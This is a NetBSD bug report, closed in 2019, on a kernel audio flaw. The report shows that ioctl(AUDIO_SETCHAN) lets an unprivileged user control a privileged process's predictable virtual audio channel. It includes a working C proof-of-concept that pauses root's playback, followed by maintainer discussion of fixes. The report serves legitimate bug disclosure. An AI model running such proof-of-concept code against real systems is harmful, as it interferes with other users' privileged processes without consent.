NetBSD Problem Report #52627
From www@NetBSD.org Wed Oct 18 13:26:10 2017
Return-Path: <www@NetBSD.org>
Received: from mail.netbsd.org (mail.netbsd.org [199.233.217.200])
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
(Client CN "mail.NetBSD.org", Issuer "mail.NetBSD.org CA" (not verified))
by mollari.NetBSD.org (Postfix) with ESMTPS id BB0C77A20D
for <gnats-bugs@gnats.NetBSD.org>; Wed, 18 Oct 2017 13:26:10 +0000 (UTC)
Message-Id: <20171018132609.B025F7A2A9@mollari.NetBSD.org>
Date: Wed, 18 Oct 2017 13:26:09 +0000 (UTC)
From: isaki@pastel-flower.jp
Reply-To: isaki@pastel-flower.jp
To: gnats-bugs@NetBSD.org
Subject: ioctl(AUDIO_SETCHAN) is able to affect privileged process
X-Send-Pr-Version: www-1.0
>Number: 52627
>Category: kern
>Synopsis: ioctl(AUDIO_SETCHAN) is able to affect privileged process
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: isaki
>State: closed
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Wed Oct 18 13:30:00 +0000 2017
>Closed-Date: Sat May 25 03:16:52 +0000 2019
>Last-Modified: Sat May 25 03:16:52 +0000 2019
>Originator: Tetsuya Isaki
>Release: NetBSD 8.0_BETA
>Organization:
>Environment:
NetBSD 8.0_BETA i386
>Description:
ioctl(AUDIO_SETCHAN) allows subsequent audio ioctls to be issued to other
virtual channels. The virtual channel number does not have credentials
(and is predictable).
This allows unprivileged user to issue any audio ioctls to privileged
process (even if sysctl hw.<dev>.multiuser = 0).
>How-To-Repeat:
% cat a.c
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/audioio.h>
#include <sys/ioctl.h>
int main(int ac, char *av[])
{
audio_info_t ai;
int fd;
int r;
int val;
fd = open("/dev/audioctl", O_RDWR);
if (fd == -1)
err(1, "open");
/* fd is virtual channel 1, so upcoming virtual channel will be 2 */
val = 2;
r = ioctl(fd, AUDIO_SETCHAN, &val);
if (r == -1)
err(1, "AUDIO_SETCHAN");
AUDIO_INITINFO(&ai);
ai.play.pause = 1;
for (;;) {
usleep(1000);
r = ioctl(fd, AUDIO_SETINFO, &ai);
if (r == -1) {
if (errno != ENXIO)
err(1, "AUDIO_SETINFO");
continue;
}
printf("pause!\n");
break;
}
close(fd);
return 0;
}
%
(First, execute this sample code by unprivileged user)
% id -u
100
% gcc a.c
% ./a.out
(Then, start playback by privileged user)
# id -u
0
# audioplay somemusic.wav
(this playback pauses soon and process blocks...)
>Fix:
N/A.
In the narrow view, virtual channel number also needs credentials? but
I don't know about security area.
In the wide view, however, I think the new audio behavior(specification)
needs more consideration before 8.0.
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: kern-bug-people->nat
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Tue, 22 May 2018 02:34:05 +0000
Responsible-Changed-Why:
I'll handle this.
From: Nathanial Sloss <nat@netbsd.org>
To: gnats-bugs@netbsd.org
Cc:
Subject: Re: kern/52627 audio_setchan affecting privileged process
Date: Mon, 28 May 2018 11:07:12 +1000
Hi,
I have a proposed fix for affecting a privileged process.
Please see:
http://mail-index.netbsd.org/tech-kern/2018/05/28/msg023451.html
Please let me know if this works for you.
Best regards,
Nat
From: matthew green <mrg@eterna.com.au>
To: gnats-bugs@NetBSD.org
Cc: nat@NetBSD.org, gnats-admin@netbsd.org, netbsd-bugs@netbsd.org,
isaki@pastel-flower.jp
Subject: re: kern/52627 audio_setchan affecting privileged process
Date: Sat, 02 Jun 2018 04:24:39 +1000
i don't think this is a real bug. as i just posted to tech-kern:
> i object to the plan here. we should simply just use the
> file system to control this, like normal unix stuff.
>
> eg, ttyaction should chown the audio device to the console
> user or whatever the admin chooses. it should be possible
> for me to decide to make things as open or as closed as
> possible via chown/chmod/mknod/rm.
.mrg.
Responsible-Changed-From-To: nat->kern-bug-people
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Wed, 08 May 2019 21:55:03 +0000
Responsible-Changed-Why:
Responsible-Changed-From-To: kern-bug-people->isaki
Responsible-Changed-By: isaki@NetBSD.org
Responsible-Changed-When: Sat, 25 May 2019 03:16:52 +0000
Responsible-Changed-Why:
State-Changed-From-To: open->closed
State-Changed-By: isaki@NetBSD.org
State-Changed-When: Sat, 25 May 2019 03:16:52 +0000
State-Changed-Why:
By merging isaki-audio2 branch, AUDIO_SETCHAN is now obsoleted.
>Unformatted:
(Contact us)
$NetBSD: query-full-pr,v 1.43 2018/01/16 07:36:43 maya Exp $
$NetBSD: gnats_config.sh,v 1.9 2014/08/02 14:16:04 spz Exp $
Copyright © 1994-2017
The NetBSD Foundation, Inc. ALL RIGHTS RESERVED.